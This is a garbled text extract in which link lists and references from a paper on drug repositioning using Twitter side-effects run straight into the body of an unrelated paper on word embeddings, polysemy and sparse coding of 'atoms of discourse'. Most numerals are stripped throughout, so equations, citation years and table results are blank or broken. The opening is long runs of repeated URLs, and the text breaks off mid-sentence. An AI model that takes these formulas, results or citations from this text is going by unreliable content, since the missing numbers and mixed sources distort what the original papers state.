http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://dx.doi.org/ . /dnp. . . . http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nprot. . http://dx.doi.org/ . /cpt. http://dx.doi.org/ . /peerj-cs. wang zy, zhang hy. . rational drug repositioning by medical genetics. nature biotechnology ( ): – doi . /nbt. . wang f, zhang p, cao n, hu j, sorrentino r. . exploring the associations between drug side-effects and therapeutic indications. journal of biomedical informatics : – doi . /j.jbi. . . . wheater g, hogan ve, teng yko, tekstra j, lafeber fp, huizinga twj, bijlsma jwj, francis rm, tuck sp, datta hk, van laar jm. . suppression of bone turnover by b-cell depletion in patients with rheumatoid arthritis. osteoporosis international ( ): – doi . /s - - - . wu y-h, ursinus j, zhou j-n, scheer fajl, ai-min b, jockers r, van heerikhuize j, swaab df. . alterations of melatonin receptors mt and mt in the hypothalamic suprachiasmatic nucleus during depression. journal of affective disorders ( – ): – doi . /j.jad. . . . xie l, kinnings s, xie l, bourne p. . predicting the polypharmacology of drugs: identifying new uses through chemoinformatics, structural informatics, and molecular modeling-based approaches. in: barratt m, frai d, eds. drug repositioning: bringing new life to shelved assets and existing drugs. hoboken: john wiley & sons. yang l, agarwal p. . systematic drug repositioning based on clinical side-effects. plos one ( ):e doi . /journal.pone. . ye h, liu q, wei j. . construction of drug network based on side effects and its application for drug repositioning. plos one ( ):e doi . /journal.pone. . zeng qt, crowell j, divita g, roth l, browne ac. . identifying consumer-friendly display (cfd) names for health concepts. in: amia annual symposium proceedings, – . available at http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc /. zhang j, jiang k, lv l, wang h, shen z, gao z, wang b, yang y, ye y, wang s. . use of genome-wide association studies for cancer research and drug repositioning. plos one ( ):e doi . /journal.pone. . zhang p, wang f, hu j, sorrentino r. . exploring the relationship between drug side-effects and therapeutic indications. amia annual symposium proceedings : – . nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.jad. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. computational drug repositioning based on side-effects mined from social media introduction methods mining twitter for drug side-effects twitter data calculating the sample covariance matrix shrinkage estimation graphical lasso for sparse inverse covariance estimation results and discussion recovering known indications predicting proposed indications of compounds currently in clinical trials conclusions acknowledgements references linear algebraic structure of word senses, with applications to polysemy sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, andrej risteski computer science department, princeton university olden st, princeton, nj {arora,yuanzhil,yingyul,tengyu,risteski}@cs.princeton.edu abstract word embeddings are ubiquitous in nlp and information retrieval, but it is unclear what they represent when the word is polysemous. here it is shown that multiple word senses re- side in linear superposition within the word embedding and simple sparse coding can re- cover vectors that approximately capture the senses. the success of our approach, which applies to several embedding methods, is mathematically explained using a variant of the random walk on discourses model (arora et al., ). a novel aspect of our tech- nique is that each extracted word sense is ac- companied by one of about “discourse atoms” that gives a succinct description of which other words co-occur with that word sense. discourse atoms can be of indepen- dent interest, and make the method potentially more useful. empirical tests are used to verify and support the theory. introduction word embeddings are constructed using firth’s hy- pothesis that a word’s sense is captured by the distri- bution of other words around it (firth, ). clas- sical vector space models (see the survey by tur- ney and pantel ( )) use simple linear algebra on the matrix of word-word co-occurrence counts, whereas recent neural network and energy-based models such as word vec use an objective that in- volves a nonconvex (thus, also nonlinear) function of the word co-occurrences (bengio et al., ; mikolov et al., a; mikolov et al., b). this nonlinearity makes it hard to discern how these modern embeddings capture the different senses of a polysemous word. the monolithic view of embeddings, with the internal information ex- tracted only via inner product, is felt to fail in cap- turing word senses (griffiths et al., ; reisinger and mooney, ; iacobacci et al., ). re- searchers have instead sought to capture polysemy using more complicated representations, e.g., by in- ducing separate embeddings for each sense (murphy et al., ; huang et al., ). these embedding- per-sense representations grow naturally out of classic word sense induction or wsi (yarowsky, ; schutze, ; reisinger and mooney, ; di marco and navigli, ) techniques that per- form clustering on neighboring words. the current paper goes beyond this mono- lithic view, by describing how multiple senses of a word actually reside in linear superposi- tion within the standard word embeddings (e.g., word vec (mikolov et al., a) and glove (pen- nington et al., )). by this we mean the follow- ing: consider a polysemous word, say tie, which can refer to an article of clothing, or a drawn match, or a physical act. let’s take the usual viewpoint that tie is a single token that represents monosemous words tie , tie , .... the theory and experiments in this paper strongly suggest that word embeddings com- puted using modern techniques such as glove and word vec satisfy: vtie ≈ α vtie + α vtie + α vtie + · · · ( ) where coefficients αi’s are nonnegative and vtie , vtie , etc., are the hypothetical embeddings of transactions of the association for computational linguistics, vol. , pp. – , . action editor: hinrich schütze. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. the different senses—those that would have been induced in the thought experiment where all oc- currences of the different senses were hand-labeled in the corpus. this linearity assertion, whereby linear structure appears out of a highly nonlinear embedding technique, is explained theoretically in section , and then empirically tested in a couple of ways in section . section uses the linearity assertion to show how to do wsi via sparse coding, which can be seen as a linear algebraic analog of the classic clustering- based approaches, albeit with overlapping clusters. on standard testbeds it is competitive with earlier embedding-for-each-sense approaches (section ). a novelty of our wsi method is that it automat- ically links different senses of different words via our atoms of discourse (section ). this can be seen as an answer to the suggestion in (reisinger and mooney, ) to enhance one-embedding-per- sense methods so that they can automatically link together senses for different words, e.g., recognize that the “article of clothing” sense of tie is connected to shoe, jacket, etc. this paper is inspired by the solution of word analogies via linear algebraic methods (mikolov et al., b), and use of sparse coding on word em- beddings to get useful representations for many nlp tasks (faruqui et al., ). our theory builds conceptually upon the random walk on discourses model of arora et al. ( ), although we make a small but important change to explain empirical findings regarding polysemy. our wsi procedure applies (with minor variation in performance) to canonical embeddings such as word vec and glove as well as the older vector space methods such as pmi (church and hanks, ). this is not surpris- ing since these embeddings are known to be interre- lated (levy and goldberg, ; arora et al., ). justification for linearity assertion since word embeddings are solutions to nonconvex optimization problems, at first sight it appears hope- less to reason about their finer structure. but it be- comes possible to do so using a generative model for language (arora et al., ) — a dynamic versions by the log-linear topic model of (mnih and hinton, )—which we now recall. it posits that at every point in the corpus there is a micro-topic (“what is being talked about”) called discourse that is drawn from the continuum of unit vectors in ℜd. the pa- rameters of the model include a vector vw ∈ ℜd for each word w. each discourse c defines a distribution over words pr[w | c] ∝ exp(c · vw). the model as- sumes that the corpus is generated by the slow geo- metric random walk of c over the unit sphere in ℜd : when the walk is at c, a few words are emitted by i.i.d. samples from the distribution ( ), which, due to its log-linear form, strongly favors words close to c in cosine similarity. estimates for learning parame- ters vw using mle and moment methods correspond to standard embedding methods such as glove and word vec (see the original paper). to study how word embeddings capture word senses, we’ll need to understand the relationship be- tween a word’s embedding and those of words it co-occurs with. in the next subsection, we pro- pose a slight modification to the above model and shows how to infer the embedding of a word from the embeddings of other words that co-occur with it. this immediately leads to the linearity assertion, as shown in section . . . gaussian walk model as alluded to before, we modify the random walk model of (arora et al., ) to the gaussian ran- dom walk model. again, the parameters of the model include a vector vw ∈ ℜd for each word w. the model assumes the corpus is generated as follows. first, a discourse vector c is drawn from a gaussian with mean and covariance Σ. then, a window of n words w , w , . . . , wn are generated from c by: pr[w , w , . . . , wn| c] = n∏ i= pr[wi| c], ( ) pr[wi | c] = exp(c · vwi )/zc, ( ) where zc = ∑ w exp(⟨vw, c⟩) is the partition func- tion. we also assume the partition function concen- trates in the sense that zc ≈ z exp(∥c∥ ) for some constant z. this is a direct extension of (arora et al., , lemma . ) to discourse vectors with norm other than , and causes the additional term exp(∥c∥ ). the formal proof of (arora et al., ) still applies in this setting. the simplest way to informally justify this assumption theorem . assume the above generative model, and let s denote the random variable of a window of n words. then, there is a linear transformation a such that vw ≈ a e [ n ∑ wi∈s vwi | w ∈ s ] . proof. let cs be the discourse vector for the whole window s. by the law of total expectation, we have e [cs | w ∈ s] =e [e[cs | s = w . . . wj− wwj+ . . . wn] | w ∈ s] . ( ) we evaluate the two sides of the equation. first, by bayes’ rule and the assumptions on the distribution of c and the partition function, we have: p(c|w) ∝ p(w|c)p(c) ∝ zc exp(⟨vw, c⟩) · exp ( − c⊤Σ− c ) ≈ z exp ( ⟨vw, c⟩− c⊤ ( Σ− + i ) c ) . so c | w is a gaussian distribution with mean e [c | w] ≈ (Σ− + i)− vw. ( ) next, we compute e[c|w , . . . , wn]. again using bayes’ rule and the assumptions on the distribution of c and the partition function, p(c|w , . . . , wn) ∝ p(w , . . . , wn|c)p(c) ∝ p(c) n∏ i= p(wi|c) ≈ zn exp ( n∑ i= v⊤wi c − c ⊤ ( Σ− + ni ) c ) . so c|w . . . wn is a gaussian distribution with mean e[c|w , . . . , wn] ≈ ( Σ− + ni )− n∑ i= vwi . ( ) now plugging in equation ( ) and ( ) into equa- tion ( ), we conclude that (Σ− + i)− vw ≈ (Σ− + ni)− e [ n∑ i= vwi | w ∈ s ] . is to assume vw are random vectors, and then zc can be shown to concentrate around exp(∥c∥ ). such a condition enforces the word vectors to be isotropic to some extent, and makes the covariance of the discourse identifiable. re-arranging the equation completes the proof with a = n(Σ− + i)(Σ− + ni)− . note: interpretation. theorem shows that there exists a linear relationship between the vector of a word and the vectors of the words in its contexts. consider the following thought experiment. first, choose a word w. then, for each window s contain- ing w, take the average of the vectors of the words in s and denote it as vs. now, take the average of vs for all the windows s containing w, and denote the average as u. theorem says that u can be mapped to the word vector vw by a linear transformation that does not depend on w. this linear structure may also have connections to some other phenomena related to linearity, e.g., gittens et al. ( ) and tian et al. ( ). exploring such connections is left for future work. the linear transformation is closely related to Σ, which describes the distribution of the discourses. if we choose a coordinate system such that Σ is a diagonal matrix with diagonal entries λi, then a will also be a diagonal matrix with diagonal en- tries (n + nλi)/( + nλi). this is smoothing the spectrum and essentially shrinks the directions cor- responding to large λi relatively to the other direc- tions. such directions are for common discourses and thus common words. empirically, we indeed observe that a shrinks the directions of common words. for example, its last right singular vector has, as nearest neighbors, the vectors for words like “with”, “as”, and “the.” note that empirically, a is not a diagonal matrix since the word vectors are not in the coordinate system mentioned. note: implications for glove and word vec. repeating the calculation in arora et al. ( ) for our new generative model, we can show that the solutions to glove and word vec training ob- jectives solve for the following vectors: v̂w =( Σ− + i )− / vw. since these other embeddings are the same as vw’s up to linear transformation, theorem (and the linearity assertion) still holds for them. empirically, we find that ( Σ− + i )− / is close to a scaled identity matrix (since ∥Σ− ∥ is small), so v̂w’s can be used as a surrogate of vw’s. experimental note: using better sentence em- beddings, sif embeddings. theorem implicitly uses the average of the neighboring word vectors as an estimate (mle) for the discourse vector. this estimate is of course also a simple sentence em- bedding, very popular in empirical nlp work and also reminiscent of word vec’s training objective. in practice, this naive sentence embedding can be improved by taking a weighted combination (often tf-idf) of adjacent words. the paper (arora et al., ) uses a simple twist to the generative model in (arora et al., ) to provide a better estimate of the discourse c called sif embedding, which is bet- ter for downstream tasks and surprisingly compet- itive with sophisticated lstm-based sentence em- beddings. it is a weighted average of word em- beddings in the window, with smaller weights for more frequent words (reminiscent of tf-idf). this weighted average is the mle estimate of c if above generative model is changed to: p(w|c) = αp(w) + ( − α) exp(vw · c) zc , where p(w) is the overall probability of word w in the corpus and α > is a constant (hyperparameter). the theory in the current paper works with sif embeddings as an estimate of the discourse c; in other words, in theorem we replace the average word vector with the sif vector of that window. em- pirically we find that it leads to similar results in test- ing our theory (section ) and better results in down- stream wsi applications (section ). therefore, sif embeddings are adopted in our experiments. . proof of linearity assertion now we use theorem to show how the linear- ity assertion follows. recall the thought experiment considered there. suppose word w has two distinct senses s and s . compute a word embedding vw for w. then hand-replace each occurrence of a sense of w by one of the new tokens s , s depending upon which one is being used. next, train separate embed- dings for s , s while keeping the other embeddings fixed. (nb: the classic clustering-based sense induc- tion (schutze, ; reisinger and mooney, ) can be seen as an approximation to this thought ex- periment.) theorem (main). assuming the model of sec- tion . , embeddings in the thought experiment above will satisfy ∥vw − v̄w∥ → as the corpus length tends to infinity, where v̄w ≈ αvs + βvs for α = f f + f , β = f f + f , where f and f are the numbers of occurrences of s , s in the corpus, respectively. proof. suppose we pick a random sample of n win- dows containing w in the corpus. for each window, compute the average of the word vectors and then apply the linear transformation in theorem . the transformed vectors are i.i.d. estimates for vw, but with high probability about f /(f + f ) fraction of the occurrences used sense s and f /(f + f ) used sense s , and the corresponding estimates for those two subpopulations converge to vs and vs respec- tively. thus by construction, the estimate for vw is a linear combination of those for vs and vs . note. theorem (and hence the linearity asser- tion) holds already for the original model in arora et al. ( ) but with a = i, where i is the iden- tity transformation. in practice, we find inducing the word vector requires a non-identity a, which is the reason for the modified model of section . . this also helps to address a nagging issue hiding in older clustering-based approaches such as reisinger and mooney ( ) and huang et al. ( ), which iden- tified senses of a polysemous word by clustering the sentences that contain it. one imagines a good rep- resentation of the sense of an individual cluster is simply the cluster center. this turns out to be false — the closest words to the cluster center sometimes are not meaningful for the sense that is being cap- tured; see table . indeed, the authors of reisinger and mooney ( ) seem aware of this because they mention “we do not assume that clusters correspond to traditional word senses. rather, we only rely on clusters to capture meaningful variation in word usage.” we find that applying a to cluster centers makes them meaningful again. see also table . towards wsi: atoms of discourse now we consider how to do wsi using only word embeddings and the linearity assertion. our ap- proach is fully unsupervised, and tries to induce senses for all words in one go, together with a vector representation for each sense. center before and provide providing a after providing provide opportunities provision center before and a to the after access accessible allowing provide table : four nearest words for some cluster cen- ters that were computed for the word “access” by applying -means on the estimated discourse vec- tors (see section . ) of random windows from wikipedia containing “access”. after applying the linear transformation of theorem to the center, the nearest words become meaningful. given embeddings for all words, it seems un- clear at first sight how to pin down the senses of tie using only ( ) since vtie can be expressed in in- finitely many ways as such a combination, and this is true even if αi’s were known (and they aren’t). to pin down the senses we will need to interrelate the senses of different words, for example, relate the “article of clothing” sense tie with shoe, jacket, etc. to do so we rely on the generative model of sec- tion . according to which unit vector in the em- bedding space corresponds to a micro-topic or dis- course. empirically, discourses c and c′ tend to look similar to humans (in terms of nearby words) if their inner product is larger than . , and quite different if the inner product is smaller than . . so in the dis- cussion below, a discourse should really be thought of as a small region rather than a point. one imagines that the corpus has a “clothing” dis- course that has a high probability of outputting the tie sense, and also of outputting related words such as shoe, jacket, etc. by ( ) the probability of be- ing output by a discourse is determined by the inner product, so one expects that the vector for “clothing” discourse has a high inner product with all of shoe, jacket, tie , etc., and thus can stand as surrogate for vtie in ( )! thus it may be sufficient to consider the following global optimization: given word vectors {vw} in ℜd and two inte- gers k, m with k < m, find a set of unit vectors a , a , . . . , am such that vw = m∑ j= αw,j aj + ηw ( ) where at most k of the coefficients αw, , . . . , αw,m are nonzero, and ηw’s are error vectors. here k is the sparsity parameter, and m is the number of atoms, and the optimization minimizes the norms of ηw’s (the ℓ -reconstruction error): ∑ w ∥∥∥∥vw − m∑ j= αw,j aj ∥∥∥∥ . ( ) both aj ’s and αw,j ’s are unknowns, and the opti- mization is nonconvex. this is just sparse coding, useful in neuroscience (olshausen and field, ) and also in image processing, computer vision, etc. this optimization is a surrogate for the desired ex- pansion of vtie as in ( ), because one can hope that among a , . . . , am there will be directions corre- sponding to clothing, sports matches, etc., that will have high inner products with tie , tie , etc., re- spectively. furthermore, restricting m to be much smaller than the number of words ensures that the typical ai needs to be reused to express multiple words. we refer to ai’s, discovered by this procedure, as atoms of discourse, since experimentation suggests that the actual discourse in a typical place in text (namely, vector c in ( )) is a linear combination of a small number, around - , of such atoms. implica- tions of this for text analysis are left for future work. relationship to clustering. sparse coding is solved using alternating minimization to find the ai’s that minimize ( ). this objective function re- veals sparse coding to be a linear algebraic analogue of overlapping clustering, whereby the ai’s act as cluster centers and each vw is assigned in a soft way to at most k of them (using the coefficients αw,j , of which at most k are nonzero). in fact this clustering viewpoint is also the basis of the alternating mini- mization algorithm. in the special case when k = , each vw has to be assigned to a single cluster, which is the familiar geometric clustering with squared ℓ distance. similar overlapping clustering in a traditional graph-theoretic setup —clustering while simultane- ously cross-relating the senses of different words— seems more difficult but worth exploring. experimental tests of theory . test of gaussian walk model: induced embeddings now we test the prediction of the gaussian walk model suggesting a linear method to induce embed- #paragraphs k k k million cos similarity . . . . table : fitting the glove word vectors with aver- age discourse vectors using a linear transformation. the first row is the number of paragraphs used to compute the discourse vectors, and the second row is the average cosine similarities between the fitted vectors and the glove vectors. dings from the context of a word. start with the glove embeddings; let vw denote the embedding for w. randomly sample many paragraphs from wikipedia, and for each word w′ and each occur- rence of w′ compute the sif embedding of text in the window of words centered around w′. aver- age the sif embeddings for all occurrences of w′ to obtain vector uw′ . the gaussian walk model says that there is a linear transformation that maps uw′ to vw′ , so solve the regression: argmina ∑ w ∥auw − vw∥ . ( ) we call the vectors auw the induced embeddings. we can test this method of inducing embeddings by holding out / words randomly, doing the regres- sion ( ) on the rest, and computing the cosine sim- ilarities between auw and vw on the heldout set of words. table shows that the average cosine similar- ity between the induced embeddings and the glove vectors is large. by contrast the average similar- ity between the average discourse vectors and the glove vectors is much smaller (about . ), illus- trating the need for the linear transformation. sim- ilar results are observed for the word vec and sn vectors (arora et al., ). . test of linearity assertion we do two empirical tests of the linearity assertion (theorem ). test . the first test involves the classic artificial polysemous words (also called pseudowords). first, pre-train a set w of word vectors on wikipedia with existing embedding methods. then, randomly pick m pairs of non-repeated words, and for each pair, replace each occurrence of either of the two words m pairs · relative error sn . . . glove . . . cos similarity sn . . . glove . . . table : the average relative errors and cosine sim- ilarities between the vectors of pseudowords and those predicted by theorem . m pairs of words are randomly selected and for each pair, all occurrences of the two words in the corpus is replaced by a pseu- doword. then train the vectors for the pseudowords on the new corpus. with a pseudoword. third, train a set w of vectors on the new corpus, while holding fixed the vectors of words that were not involved in the pseudowords. construction has ensured that each pseudoword has two distinct “senses”, and we also have in w the “ground truth” vectors for those senses. theorem implies that the embedding of a pseudoword is a lin- ear combination of the sense vectors, so we can com- pare this predicted embedding to the one learned in w . suppose the trained vector for a pseudoword w is uw and the predicted vector is vw, then the comparison criterion is the average relative error |s| ∑ w∈s ∥uw−vw∥ ∥vw∥ where s is the set of all the pseudowords. we also report the average cosine similarity between vw’s and uw’s. table shows the results for the glove and sn (arora et al., ) vectors, averaged over runs. when m is small, the error is small and the co- sine similarity is as large as . . even if m = · note that this discussion assumes that the set of pseu- dowords is small, so that a typical neighborhood of a pseu- doword does not consist of other pseudowords. otherwise the ground truth vectors in w become a bad approximation to the sense vectors. here w is trained while fixing the vectors of words not involved in pseudowords to be their pre-trained vectors in w . we can also train all the vectors in w from random initializa- tion. such w will not be aligned with w . then we can learn a linear transformation from w to w using the vectors for the words not involved in pseudowords, apply it on the vectors for the pseudowords, and compare the transformed vectors to the predicted ones. this is tested on word vec, resulting in relative errors between % and %, and cosine similarities between . and . . these results again support our analysis. vector type glove skip-gram sn cosine . . . table : the average cosine of the angles between the vectors of words and the span of vector represen- tations of its senses. the words tested are those in the wsi task of semeval . (i.e., about % of the words in the vocabulary are replaced by pseudowords), the cosine similarity re- mains above . , which is significant in the di- mensional space. this provides positive support for our analysis. test . the second test is a proxy for what would be a complete (but laborious) test of the linearity assertion: replicating the thought experiment while hand-labeling sense usage for many words in a cor- pus. the simpler proxy is as follows. for each word w, wordnet (fellbaum, ) lists its vari- ous senses by providing definition and example sen- tences for each sense. this is enough text (roughly a paragraph’s worth) for our theory to allow us to represent it by a vector —specifically, apply the sif sentence embedding followed by the linear transfor- mation learned as in section . . the text embed- ding for sense s should approximate the ground truth vector vs for it. then the linearity assertion pre- dicts that embedding vw lies close to the subspace spanned by the sense vectors. (note that this is a nontrivial event: in dimensions a random vector will be quite far from the subspace spanned by some other random vectors.) table checks this predic- tion using the polysemous words appearing in the wsi task of semeval . we tested three stan- dard word embedding methods: glove, the skip- gram variant of word vec, and sn (arora et al., ). the results show that the word vectors are quite close to the subspace spanned by the senses. experiments with atoms of discourse the experiments use -dimensional embeddings created using the sn objective in (arora et al., ) and a wikipedia corpus of billion tokens (wikime- dia, ), and the sparse coding is solved by stan- dard k-svd algorithm (damnjanovic et al., ). experimentation showed that the best sparsity pa- rameter k (i.e., the maximum number of allowed senses per word) is , and the number of atoms m is about . for the number of senses k, we tried plausible alternatives (based upon suggestions of many colleagues) that allow k to vary for differ- ent words, for example to let k be correlated with the word frequency. but a fixed choice of k = seems to produce just as good results. to understand why, realize that this method retains no information about the corpus except for the low dimensional word em- beddings. since the sparse coding tends to express a word using fairly different atoms, examining ( ) shows that ∑ j α w,j is bounded by approximately ∥vw∥ . so if too many αw,j ’s are allowed to be nonzero, then some must necessarily have small co- efficients, which makes the corresponding compo- nents indistinguishable from noise. in other words, raising k often picks not only atoms corresponding to additional senses, but also many that don’t. the best number of atoms m was found to be around . this was estimated by re-running the sparse coding algorithm multiple times with dif- ferent random initializations, whereupon substantial overlap was found between the two bases: a large fraction of vectors in one basis were found to have a very close vector in the other. thus combining the bases while merging duplicates yielded a basis of about the same size. around atoms are used by a large number of words or have no close-by words. they appear semantically meaningless and are ex- cluded by checking for this condition. the content of each atom can be discerned by looking at the nearby words in cosine similarity. some examples are shown in table . each word is represented using at most five atoms, which usually capture distinct senses (with some noise/mistakes). the senses recovered for tie and spring are shown in table . similar results can be obtained by using other word embeddings like word vec and glove. we also observe sparse coding procedures assign nonnegative values to most coefficients αw,j ’s even if they are left unrestricted. probably this is because the appearances of a word are best explained by what discourse is being used to generate it, rather than 